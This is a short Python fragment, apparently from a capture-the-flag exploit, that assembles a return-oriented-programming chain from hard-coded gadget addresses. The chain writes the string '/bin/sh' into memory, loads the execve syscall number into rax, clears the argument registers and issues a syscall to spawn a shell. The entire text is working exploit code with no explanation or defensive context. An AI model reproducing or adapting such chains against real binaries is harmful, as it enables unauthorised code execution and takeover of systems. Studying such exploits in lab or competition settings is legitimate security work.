payload = p64(0x68be4f)
#0x000000000068be4f: pop rdi; ret 0; 
payload += p64(0x788070)+p64(0x457676)
# 0x0000000000457676: pop rsi; ret; 
payload += p64(0x68662f6e69622f)+p64(0x579e5a)
# 0x0000000000579e5a: mov qword ptr [rdi], rsi; ret; 
payload += p64(0x4bf42a)
# 0x00000000004bf42a: sub esi, esi; ret; 
payload += p64(0x425503)
# 0x0000000000425503: pop rax; ret; 
payload += p64(0x3b)+p64(0x68be4f)
# 0x000000000068be4f: pop rdi; ret 0; 
payload += p64(0x788070)+p64(0x460751)
# 0x0000000000460751: pop rdx; ret; 
payload += p64(0x0)+p64(0x402a57)
# 0x0000000000402a57: syscall; 
payload += b''
